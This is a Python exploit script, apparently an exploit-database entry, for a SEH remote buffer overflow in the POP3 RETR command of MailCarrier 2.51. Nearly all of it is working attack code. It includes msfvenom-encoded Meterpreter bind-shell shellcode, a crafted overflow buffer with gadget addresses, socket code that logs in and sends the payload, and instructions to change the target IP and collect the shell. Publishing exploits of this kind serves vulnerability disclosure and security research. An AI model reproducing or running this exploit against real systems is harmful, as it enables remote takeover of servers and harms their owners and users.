#!/usr/bin/python # Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "RETR" command(POP3) # Date: 16/04/2019 # Exploit Author: Dino Covotsos - Telspace Systems # Vendor Homepage: https://www.tabslab.com/ # Version: 2.51 # Software Link: N.A # Contact: services[@]telspace.co.za # Twitter: @telspacesystems (Greets to the Telspace Crew) # Tested on: Windows XP Prof SP3 ENG x86 # CVE: TBC from Mitre # Created for the Telspace Internship 2019 - SEH Exploit # POC # 1.) Change ip, username, password and port in code # 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine #0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll) #N.B For all Mail Carrier exploits, increase/decrease the initial EIP overwrite buffer if your target ip is larger/smaller in digits. #Crash at 6174 import sys import socket import time #msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" "\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f" "\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50" "\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63" "\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f" "\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69" "\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72" "\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e" "\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61" "\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33" "\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b" "\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46" "\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53" "\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70" "\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b" "\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c" "\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64" "\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59" "\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b" "\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33" "\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c" "\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33" "\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38" "\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74" "\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a" "\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48" "\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69" "\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59" "\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45" "\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b" "\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71" "\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52" "\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44" "\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79" "\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b" "\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75" "\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43" "\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66" "\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f" "\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67" "\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b" "\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69" "\x6f\x78\x55\x41\x41") buffer = "A" * 6174 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (10000-6882) print "[*] Mail Server 2.51 POP3 Buffer Overflow in RETR command\r\n" print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(("192.168.0.150", 110)) print s.recv(1024) print "[*] Sending USERNAME\r\n" s.send('USER test' + '\r\n') print s.recv(1024) print "[*] Sending PASSWORD\r\n" s.send('PASS test' + '\r\n') print s.recv(1024) s.send('RETR ' + buffer + '\r\n') s.send('QUIT\r\n') s.close() time.sleep(1) print "[*] Done, check for meterpreter shell on target ip port 443!"